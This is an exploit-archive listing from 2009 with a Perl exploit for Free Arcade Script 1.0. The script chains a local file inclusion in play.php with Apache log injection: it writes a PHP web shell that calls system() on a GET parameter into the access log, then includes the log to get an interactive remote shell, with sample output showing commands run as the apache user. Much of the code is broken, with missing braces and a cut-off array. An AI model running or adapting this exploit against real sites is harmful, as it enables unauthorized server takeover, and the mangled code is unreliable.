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Free Arcade Script 1.0 Command Execution

Free Arcade Script 1.0 Command Execution
Posted Feb 23, 2009
Authored by Osirys | Site y-osirys.com

Free Arcade Script version 1.0 command execution exploit that leverages local file inclusion.

tags | exploit, local, file inclusion
SHA-256 | 760f3aa37672fbff5e8a85a9b9c8297515e5ef595a4f439550042959705efc3f

Free Arcade Script 1.0 Command Execution

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# |----------------------------------------------------------------------------------------------------------------------------------|
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Free Arcade Script 1.0 |
# |Download : http://freearcadescript.net/download.php?type=zip&name=freearcadescript&size=null&file=freearcadescriptv1.0.zip |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit via Apache Log Injection |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |/[path]/pages/play.php is affected to Local File Inclusion vulnerability:
# |[code]
# |<?php
# |$ID = abs((int) $_GET['ID']);
# |if(!$ID){
# | echo '<div class=\'error\'>No game selected.</div>';
# | include ('templates/'.$template.'/footer.php');
# | exit;
# |}
# |[/code]
# |$template is not declared. So, in case of php.ini configuration :
# |register_globals = On
# |we can set $template value from GET :
# |p0c : /[path]/pages/play.php?template=[lfi]%00

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lfi.txt http://localhost/freearcadescriptv1.0/
# ---------------------------------
# Free Arcade Script RCE Sploit
# (Log Inj)
# by Osirys
# ---------------------------------
# [*] Injecting evil php code ..
# [*] Cheeking for Apache Logs ..
# [*] Apache Log Injection completed
# [*] Path: /var/log/httpd/access_log
# [!] Hi my master, do your job now [x]
# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pws
# bash: pws: command not found
# shell[localhost]$> pwd
# /home/osirys/web/freearcadescriptv1.0/pages
# shell[localhost]$> exit
# [-] Quitting ..
# osirys[~]>$
# ------------------------------------------------------------------

use IO::Socket::INET;
use LWP::UserAgent;

my $host = $ARGV[0];
my $lfi_path = "/pages/play.php?template=";
my $null_byte = "%00";
my $rand_a = int(rand 150);
my $rand1 = "1337".$rand_a."1337";
my $rand_b = int(rand 150);
my $rand2 = "1337".$rand_b."1337";
my $gotcha = 0;
my $dir_trasv = "../../../../../../../../../..";
my @logs_dirs = qw(

my $php_code = "<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=st".
"ripslashes(\$_GET[cmd]);} system(\$_GET[cmd]);?>";

($host) || help("-1");
cheek($host) == 1 || help("-2");

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

$sock = IO::Socket::INET->new(
PeerAddr => $h0st,
PeerPort => 80,
Proto => "tcp"
) || die "Can't connect to $host:80!\n";

print "[*] Injecting evil php code ..\n";

print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";

print "[*] Cheeking for Apache Logs ..\n";

while (($log = <@logs_dirs>)&&($gotcha != 1)) {
$tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte;
$re = get_req($tmp_path);
if ($re =~ /Osirys_log_inj/) {
$gotcha = 1;
$log_path = $tmp_path;
print "[*] Apache Log Injection completed\n";
print "[*] Path: $log\n";
print "[!] Hi my master, do your job now [x]\n\n";

$gotcha == 1 || die "[-] Couldn't find Apache Logs\n";

sub exec_cmd {
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = <STDIN>;
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";
$exec_url = $log_path."&cmd=".$cmd;
my $re = get_req($exec_url);
my $content = tag($re);
if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
print "$out\n";
else {
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";


sub get_req() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
else {
return 0;

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;

sub banner {
print "\n".
" --------------------------------- \n".
" Free Arcade Script RCE Sploit \n".
" (Log Inj) \n".
" by Osirys \n".
" --------------------------------- \n\n";

sub help() {
my $error = $_[0];
if ($error == -1) {
print "\n[-] Input data failed ! \n";
elsif ($error == -2) {
print "\n[-] Bad hostname address !\n";
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";

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